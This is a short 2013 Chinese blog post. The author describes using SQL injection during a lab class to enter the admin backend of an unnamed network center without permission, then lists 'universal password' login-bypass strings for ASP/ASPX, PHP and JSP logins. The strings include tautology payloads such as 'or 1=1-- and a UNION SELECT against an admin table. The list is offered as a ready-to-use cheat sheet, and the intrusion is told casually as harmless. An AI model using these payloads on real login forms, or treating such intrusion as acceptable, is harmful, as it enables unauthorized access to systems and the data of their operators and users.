A-A+

网络中心SQL注入漏洞(万能密码汇总)

2013年04月11日 其他 暂无评论 阅读 1,232 次

******网络中心SQL注入漏洞******

起始: 2013年4月11日 实验课

动机:下载高清影院客户端shipin.rar

过程:登录直接跳转某页面的后台,疑似出问题...

进入:SQL注入,你懂的,进去时候已经出问题了(不然我也进不去),没什么特别的东西!

******仅仅进去看了看,结束*******

万能密码汇总

万能密码汇总

截至到现在,网站已经打不开,附上一下SQL注入总结的万能密码,至于为什么会存在万能密码,大家还是去百度吧,不多说!学过SQL的基本上都能了解到!过滤不严,逻辑真!

[cpp]

asp aspx万能密码

"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1%00
"or 1=1%00
'xor
用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
密码 1
..admin' or 'a'='a 密码随便

PHP万能密码

'or 1=1/*
User: something
Pass: ' OR '1'='1

jsp 万能密码

1'or'1'='1
admin' OR 1=1/*

[/cpp]

标签:

给我留言

Copyright © C/C++程序员之家 保留所有权利.   Theme  Ality 浙ICP备15011757号-3

用户登录